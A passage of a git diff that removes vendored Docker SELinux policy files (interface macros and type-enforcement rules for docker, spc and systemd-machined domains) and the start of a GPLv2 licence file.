-        type docker_share_t;
-    	type docker_log_t;
-	    type docker_var_run_t;
-        type docker_home_t;
-    ')
-
-    files_pid_filetrans($1, docker_var_run_t, file, "docker.pid")
-    files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock")
-    files_pid_filetrans($1, docker_var_run_t, dir, "docker-client")
-    logging_log_filetrans($1, docker_log_t, dir, "lxc")
-    files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf")
-    filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init")
-    userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker")
-')
-
-########################################
-## <summary>
-##	Connect to docker over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_stream_connect',`
-	gen_require(`
-		type docker_t, docker_var_run_t;
-	')
-
-	files_search_pids($1)
-	stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t)
-')
-
-########################################
-## <summary>
-##	Connect to SPC containers over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_spc_stream_connect',`
-	gen_require(`
-		type spc_t, spc_var_run_t;
-	')
-
-	files_search_pids($1)
-	files_write_all_pid_sockets($1)
-	allow $1 spc_t:unix_stream_socket connectto;
-')
-
-########################################
-## <summary>
-##	All of the rules required to administrate
-##	an docker environment
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_admin',`
-	gen_require(`
-		type docker_t;
-		type docker_var_lib_t, docker_var_run_t;
-		type docker_unit_file_t;
-		type docker_lock_t;
-		type docker_log_t;
-		type docker_config_t;
-	')
-
-	allow $1 docker_t:process { ptrace signal_perms };
-	ps_process_pattern($1, docker_t)
-
-	admin_pattern($1, docker_config_t)
-
-	files_search_var_lib($1)
-	admin_pattern($1, docker_var_lib_t)
-
-	files_search_pids($1)
-	admin_pattern($1, docker_var_run_t)
-
-	files_search_locks($1)
-	admin_pattern($1, docker_lock_t)
-
-	logging_search_logs($1)
-	admin_pattern($1, docker_log_t)
-
-	docker_systemctl($1)
-	admin_pattern($1, docker_unit_file_t)
-	allow $1 docker_unit_file_t:service all_service_perms;
-
-	optional_policy(`
-		systemd_passwd_agent_exec($1)
-		systemd_read_fifo_file_passwd_run($1)
-	')
-')
-
-########################################
-## <summary>
-##	Execute docker_auth_exec_t in the docker_auth domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain allowed to transition.
-## </summary>
-## </param>
-#
-interface(`docker_auth_domtrans',`
-	gen_require(`
-		type docker_auth_t, docker_auth_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	domtrans_pattern($1, docker_auth_exec_t, docker_auth_t)
-')
-
-######################################
-## <summary>
-##	Execute docker_auth in the caller domain.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_auth_exec',`
-	gen_require(`
-		type docker_auth_exec_t;
-	')
-
-	corecmd_search_bin($1)
-	can_exec($1, docker_auth_exec_t)
-')
-
-########################################
-## <summary>
-##	Connect to docker_auth over a unix stream socket.
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-#
-interface(`docker_auth_stream_connect',`
-	gen_require(`
-		type docker_auth_t, docker_plugin_var_run_t;
-	')
-
-	files_search_pids($1)
-	stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t)
-')
-
-########################################
-## <summary>
-##	docker domain typebounds calling domain.
-## </summary>
-## <param name="domain">
-## <summary>
-##	Domain to be typebound.
-## </summary>
-## </param>
-#
-interface(`docker_typebounds',`
-	gen_require(`
-		type docker_t;
-	')
-
-	typebounds docker_t $1;
-')
-
-########################################
-## <summary>
-##	Allow any docker_exec_t to be an entrypoint of this domain
-## </summary>
-## <param name="domain">
-##	<summary>
-##	Domain allowed access.
-##	</summary>
-## </param>
-## <rolecap/>
-#
-interface(`docker_entrypoint',`
-	gen_require(`
-		type docker_exec_t;
-	')
-	allow $1 docker_exec_t:file entrypoint;
-')
-
-########################################
-## <summary>
-##     Send and receive messages from
-##     systemd machined over dbus.
-## </summary>
-## <param name="domain">
-##     <summary>
-##     Domain allowed access.
-##     </summary>
-## </param>
-#
-interface(`systemd_dbus_chat_machined',`
-       gen_require(`
-               type systemd_machined_t;
-               class dbus send_msg;
-       ')
-
-       allow $1 systemd_machined_t:dbus send_msg;
-       allow systemd_machined_t $1:dbus send_msg;
-       ps_process_pattern(systemd_machined_t, $1)
-')
-
-########################################
-## <summary>
-##     Allow any svirt_sandbox_file_t to be an entrypoint of this domain
-## </summary>
-## <param name="domain">
-##     <summary>
-##     Domain allowed access.
-##     </summary>
-## </param>
-## <rolecap/>
-#
-interface(`virt_sandbox_entrypoint',`
-       gen_require(`
-               type svirt_sandbox_file_t;
-       ')
-       allow $1 svirt_sandbox_file_t:file entrypoint;
-')
-
-########################################
-## <summary>
-##      Send and receive messages from
-##      virt over dbus.
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`virt_dbus_chat',`
-        gen_require(`
-                type virtd_t;
-                class dbus send_msg;
-        ')
-
-        allow $1 virtd_t:dbus send_msg;
-        allow virtd_t $1:dbus send_msg;
-        ps_process_pattern(virtd_t, $1)
-')
-
-#######################################
-## <summary>
-##      Read the process state of virt sandbox containers
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`virt_sandbox_read_state',`
-       gen_require(`
-               attribute svirt_sandbox_domain;
-       ')
-
-       ps_process_pattern($1, svirt_sandbox_domain)
-')
-
-######################################
-## <summary>
-##     Send a signal to sandbox domains
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`virt_signal_sandbox',`
-       gen_require(`
-               attribute svirt_sandbox_domain;
-       ')
-
-       allow $1 svirt_sandbox_domain:process signal;
-')
-
-#######################################
-## <summary>
-##     Getattr Sandbox File systems
-## </summary>
-## <param name="domain">
-##     <summary>
-##     Domain allowed access.
-##     </summary>
-## </param>
-#
-interface(`virt_getattr_sandbox_filesystem',`
-       gen_require(`
-              type svirt_sandbox_file_t;
-       ')
-
-       allow $1 svirt_sandbox_file_t:filesystem getattr;
-')
-
-#######################################
-## <summary>
-##     Read Sandbox Files
-## </summary>
-## <param name="domain">
-##     <summary>
-##     Domain allowed access.
-##     </summary>
-## </param>
-#
-interface(`virt_read_sandbox_files',`
-       gen_require(`
-               type svirt_sandbox_file_t;
-       ')
-
-       list_dirs_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t)
-       read_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t)
-       read_lnk_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t)
-')
-
-#######################################
-## <summary>
-##      Read the process state of spc containers
-## </summary>
-## <param name="domain">
-##      <summary>
-##      Domain allowed access.
-##      </summary>
-## </param>
-#
-interface(`docker_spc_read_state',`
-        gen_require(`
-                type spc_t;
-        ')
-
-        ps_process_pattern($1, spc_t)
-')
-
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te
deleted file mode 100644
index d4de36fe46..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te
+++ /dev/null
@@ -1,465 +0,0 @@
-policy_module(docker, 1.0.0)
-
-########################################
-#
-# Declarations
-#
-
-## <desc>
-##  <p>
-##  Determine whether docker can
-##  connect to all TCP ports.
-##  </p>
-## </desc>
-gen_tunable(docker_connect_any, false)
-
-type docker_t;
-type docker_exec_t;
-init_daemon_domain(docker_t, docker_exec_t)
-domain_subj_id_change_exemption(docker_t)
-domain_role_change_exemption(docker_t)
-
-type spc_t;
-domain_type(spc_t)
-role system_r types spc_t;
-
-type docker_auth_t;
-type docker_auth_exec_t;
-init_daemon_domain(docker_auth_t, docker_auth_exec_t)
-
-type spc_var_run_t;
-files_pid_file(spc_var_run_t)
-
-type docker_var_lib_t;
-files_type(docker_var_lib_t)
-
-type docker_home_t;
-userdom_user_home_content(docker_home_t)
-
-type docker_config_t;
-files_config_file(docker_config_t)
-
-type docker_lock_t;
-files_lock_file(docker_lock_t)
-
-type docker_log_t;
-logging_log_file(docker_log_t)
-
-type docker_tmp_t;
-files_tmp_file(docker_tmp_t)
-
-type docker_tmpfs_t;
-files_tmpfs_file(docker_tmpfs_t)
-
-type docker_var_run_t;
-files_pid_file(docker_var_run_t)
-
-type docker_plugin_var_run_t;
-files_pid_file(docker_plugin_var_run_t)
-
-type docker_unit_file_t;
-systemd_unit_file(docker_unit_file_t)
-
-type docker_devpts_t;
-term_pty(docker_devpts_t)
-
-type docker_share_t;
-files_type(docker_share_t)
-
-# OL7 systemd selinux update
-type systemd_machined_t;
-type systemd_machined_exec_t;
-init_daemon_domain(systemd_machined_t, systemd_machined_exec_t)
-
-# /run/systemd/machines
-type systemd_machined_var_run_t;
-files_pid_file(systemd_machined_var_run_t)
-
-# /var/lib/machines
-type systemd_machined_var_lib_t;
-files_type(systemd_machined_var_lib_t)
-
-
-########################################
-#
-# docker local policy
-#
-allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap };
-allow docker_t self:tun_socket relabelto;
-allow docker_t self:process { getattr signal_perms setrlimit setfscreate };
-allow docker_t self:fifo_file rw_fifo_file_perms;
-allow docker_t self:unix_stream_socket create_stream_socket_perms;
-allow docker_t self:tcp_socket create_stream_socket_perms;
-allow docker_t self:udp_socket create_socket_perms;
-allow docker_t self:capability2 block_suspend;
-
-docker_auth_stream_connect(docker_t)
-
-manage_files_pattern(docker_t, docker_home_t, docker_home_t)
-manage_dirs_pattern(docker_t, docker_home_t, docker_home_t)
-manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t)
-userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker")
-
-manage_dirs_pattern(docker_t, docker_config_t, docker_config_t)
-manage_files_pattern(docker_t, docker_config_t, docker_config_t)
-files_etc_filetrans(docker_t, docker_config_t, dir, "docker")
-
-manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t)
-manage_files_pattern(docker_t, docker_lock_t, docker_lock_t)
-files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc")
-
-manage_dirs_pattern(docker_t, docker_log_t, docker_log_t)
-manage_files_pattern(docker_t, docker_log_t, docker_log_t)
-manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t)
-logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file })
-allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto };
-
-manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t)
-files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file })
-
-manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t)
-allow docker_t docker_tmpfs_t:dir relabelfrom;
-can_exec(docker_t, docker_tmpfs_t)
-fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file })
-allow docker_t docker_tmpfs_t:chr_file mounton;
-
-manage_dirs_pattern(docker_t, docker_share_t, docker_share_t)
-manage_files_pattern(docker_t, docker_share_t, docker_share_t)
-manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t)
-allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto };
-
-can_exec(docker_t, docker_share_t)
-#docker_filetrans_named_content(docker_t)
-
-manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t)
-allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto };
-files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file })
-
-manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t)
-files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file })
-
-allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms };
-term_create_pty(docker_t, docker_devpts_t)
-
-kernel_read_system_state(docker_t)
-kernel_read_network_state(docker_t)
-kernel_read_all_sysctls(docker_t)
-kernel_rw_net_sysctls(docker_t)
-kernel_setsched(docker_t)
-kernel_read_all_proc(docker_t)
-
-domain_use_interactive_fds(docker_t)
-domain_dontaudit_read_all_domains_state(docker_t)
-
-corecmd_exec_bin(docker_t)
-corecmd_exec_shell(docker_t)
-
-corenet_tcp_bind_generic_node(docker_t)
-corenet_tcp_sendrecv_generic_if(docker_t)
-corenet_tcp_sendrecv_generic_node(docker_t)
-corenet_tcp_sendrecv_generic_port(docker_t)
-corenet_tcp_bind_all_ports(docker_t)
-corenet_tcp_connect_http_port(docker_t)
-corenet_tcp_connect_commplex_main_port(docker_t)
-corenet_udp_sendrecv_generic_if(docker_t)
-corenet_udp_sendrecv_generic_node(docker_t)
-corenet_udp_sendrecv_all_ports(docker_t)
-corenet_udp_bind_generic_node(docker_t)
-corenet_udp_bind_all_ports(docker_t)
-
-files_read_config_files(docker_t)
-files_dontaudit_getattr_all_dirs(docker_t)
-files_dontaudit_getattr_all_files(docker_t)
-
-fs_read_cgroup_files(docker_t)
-fs_read_tmpfs_symlinks(docker_t)
-fs_search_all(docker_t)
-fs_getattr_all_fs(docker_t)
-
-storage_raw_rw_fixed_disk(docker_t)
-
-auth_use_nsswitch(docker_t)
-auth_dontaudit_getattr_shadow(docker_t)
-
-init_read_state(docker_t)
-init_status(docker_t)
-
-logging_send_audit_msgs(docker_t)
-logging_send_syslog_msg(docker_t)
-
-miscfiles_read_localization(docker_t)
-
-mount_domtrans(docker_t)
-
-seutil_read_default_contexts(docker_t)
-seutil_read_config(docker_t)
-
-sysnet_dns_name_resolve(docker_t)
-sysnet_exec_ifconfig(docker_t)
-
-optional_policy(`
-	rpm_exec(docker_t)
-	rpm_read_db(docker_t)
-	rpm_exec(docker_t)
-')
-
-optional_policy(`
-	fstools_domtrans(docker_t)
-')
-
-optional_policy(`
-	iptables_domtrans(docker_t)
-')
-
-optional_policy(`
-	openvswitch_stream_connect(docker_t)
-')
-
-#
-# lxc rules
-#
-
-allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace };
-
-allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms };
-
-allow docker_t self:netlink_route_socket rw_netlink_socket_perms;;
-allow docker_t self:netlink_audit_socket create_netlink_socket_perms;
-allow docker_t self:unix_dgram_socket { create_socket_perms sendto };
-allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto };
-
-allow docker_t docker_var_lib_t:dir mounton;
-allow docker_t docker_var_lib_t:chr_file mounton;
-can_exec(docker_t, docker_var_lib_t)
-
-kernel_dontaudit_setsched(docker_t)
-kernel_get_sysvipc_info(docker_t)
-kernel_request_load_module(docker_t)
-kernel_mounton_messages(docker_t)
-kernel_mounton_all_proc(docker_t)
-kernel_mounton_all_sysctls(docker_t)
-kernel_unlabeled_entry_type(spc_t)
-kernel_unlabeled_domtrans(docker_t, spc_t)
-
-dev_getattr_all(docker_t)
-dev_getattr_sysfs_fs(docker_t)
-dev_read_urand(docker_t)
-dev_read_lvm_control(docker_t)
-dev_rw_sysfs(docker_t)
-dev_rw_loop_control(docker_t)
-dev_rw_lvm_control(docker_t)
-
-files_getattr_isid_type_dirs(docker_t)
-files_manage_isid_type_dirs(docker_t)
-files_manage_isid_type_files(docker_t)
-files_manage_isid_type_symlinks(docker_t)
-files_manage_isid_type_chr_files(docker_t)
-files_manage_isid_type_blk_files(docker_t)
-files_exec_isid_files(docker_t)
-files_mounton_isid(docker_t)
-files_mounton_non_security(docker_t)
-files_mounton_isid_type_chr_file(docker_t)
-
-fs_mount_all_fs(docker_t)
-fs_unmount_all_fs(docker_t)
-fs_remount_all_fs(docker_t)
-files_mounton_isid(docker_t)
-fs_manage_cgroup_dirs(docker_t)
-fs_manage_cgroup_files(docker_t)
-fs_relabelfrom_xattr_fs(docker_t)
-fs_relabelfrom_tmpfs(docker_t)
-fs_read_tmpfs_symlinks(docker_t)
-fs_list_hugetlbfs(docker_t)
-
-term_use_generic_ptys(docker_t)
-term_use_ptmx(docker_t)
-term_getattr_pty_fs(docker_t)
-term_relabel_pty_fs(docker_t)
-term_mounton_unallocated_ttys(docker_t)
-
-modutils_domtrans_insmod(docker_t)
-
-systemd_status_all_unit_files(docker_t)
-systemd_start_systemd_services(docker_t)
-
-userdom_stream_connect(docker_t)
-userdom_search_user_home_content(docker_t)
-userdom_read_all_users_state(docker_t)
-userdom_relabel_user_home_files(docker_t)
-userdom_relabel_user_tmp_files(docker_t)
-userdom_relabel_user_tmp_dirs(docker_t)
-
-optional_policy(`
-	gpm_getattr_gpmctl(docker_t)
-')
-
-optional_policy(`
-	dbus_system_bus_client(docker_t)
-	init_dbus_chat(docker_t)
-	init_start_transient_unit(docker_t)
-
-	optional_policy(`
-		systemd_dbus_chat_logind(docker_t)
-		systemd_dbus_chat_machined(docker_t)
-	')
-
-	optional_policy(`
-		firewalld_dbus_chat(docker_t)
-	')
-')
-
-optional_policy(`
-	udev_read_db(docker_t)
-')
-
-optional_policy(`
-	unconfined_domain(docker_t)
-	# unconfined_typebounds(docker_t)
-')
-
-optional_policy(`
-	virt_read_config(docker_t)
-	virt_exec(docker_t)
-	virt_stream_connect(docker_t)
-	virt_stream_connect_sandbox(docker_t)
-	virt_exec_sandbox_files(docker_t)
-	virt_manage_sandbox_files(docker_t)
-	virt_relabel_sandbox_filesystem(docker_t)
-	# for lxc
-	virt_transition_svirt_sandbox(docker_t, system_r)
-	virt_mounton_sandbox_file(docker_t)
-#	virt_attach_sandbox_tun_iface(docker_t)
-	allow docker_t svirt_sandbox_domain:tun_socket relabelfrom;
-	virt_sandbox_entrypoint(docker_t)
-')
-
-tunable_policy(`docker_connect_any',`
-    corenet_tcp_connect_all_ports(docker_t)
-    corenet_sendrecv_all_packets(docker_t)
-    corenet_tcp_sendrecv_all_ports(docker_t)
-')
-
-########################################
-#
-# spc local policy
-#
-allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint;
-role system_r types spc_t;
-
-domtrans_pattern(docker_t, docker_share_t, spc_t)
-domtrans_pattern(docker_t, docker_var_lib_t, spc_t)
-allow docker_t spc_t:process { setsched signal_perms };
-ps_process_pattern(docker_t, spc_t)
-allow docker_t spc_t:socket_class_set { relabelto relabelfrom };
-filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay")
-
-optional_policy(`
-	systemd_dbus_chat_machined(spc_t)
-')
-
-optional_policy(`
-	dbus_chat_system_bus(spc_t)
-')
-
-optional_policy(`
-	unconfined_domain_noaudit(spc_t)
-')
-
-optional_policy(`
-	virt_transition_svirt_sandbox(spc_t, system_r)
-	virt_sandbox_entrypoint(spc_t)
-')
-
-########################################
-#
-# docker_auth local policy
-#
-allow docker_auth_t self:fifo_file rw_fifo_file_perms;
-allow docker_auth_t self:unix_stream_socket create_stream_socket_perms;
-dontaudit docker_auth_t self:capability net_admin;
-
-docker_stream_connect(docker_auth_t)
-
-manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
-files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file })
-
-domain_use_interactive_fds(docker_auth_t)
-
-kernel_read_net_sysctls(docker_auth_t)
-
-auth_use_nsswitch(docker_auth_t)
-
-files_read_etc_files(docker_auth_t)
-
-miscfiles_read_localization(docker_auth_t)
-
-sysnet_dns_name_resolve(docker_auth_t)
-
-########################################
-#
-# OL7.2 systemd selinux update
-# systemd_machined local policy
-#
-allow systemd_machined_t self:capability { dac_override setgid sys_admin sys_chroot sys_ptrace };
-allow systemd_machined_t systemd_unit_file_t:service { status start };
-allow systemd_machined_t self:unix_dgram_socket create_socket_perms;
-
-manage_dirs_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t)
-manage_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t)
-manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t)
-init_pid_filetrans(systemd_machined_t, systemd_machined_var_run_t, dir, "machines")
-
-manage_dirs_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t)
-manage_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t)
-manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t)
-init_var_lib_filetrans(systemd_machined_t, systemd_machined_var_lib_t, dir, "machines")
-
-kernel_dgram_send(systemd_machined_t)
-# This is a bug, but need for now.
-kernel_read_unlabeled_state(systemd_machined_t)
-
-init_dbus_chat(systemd_machined_t)
-init_status(systemd_machined_t)
-
-userdom_dbus_send_all_users(systemd_machined_t)
-
-term_use_ptmx(systemd_machined_t)
-
-optional_policy(`
-       dbus_connect_system_bus(systemd_machined_t)
-       dbus_system_bus_client(systemd_machined_t)
-')
-
-optional_policy(`
-       docker_read_share_files(systemd_machined_t)
-       docker_spc_read_state(systemd_machined_t)
-')
-
-optional_policy(`
-       virt_dbus_chat(systemd_machined_t)
-       virt_sandbox_read_state(systemd_machined_t)
-       virt_signal_sandbox(systemd_machined_t)
-       virt_stream_connect_sandbox(systemd_machined_t)
-       virt_rw_svirt_dev(systemd_machined_t)
-       virt_getattr_sandbox_filesystem(systemd_machined_t)
-       virt_read_sandbox_files(systemd_machined_t)
-')
-
-
diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE
deleted file mode 100644
index 5b6e7c66c2..0000000000
--- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE
+++ /dev/null
@@ -1,340 +0,0 @@
-		    GNU GENERAL PUBLIC LICENSE
-		       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
-                       59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-		    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
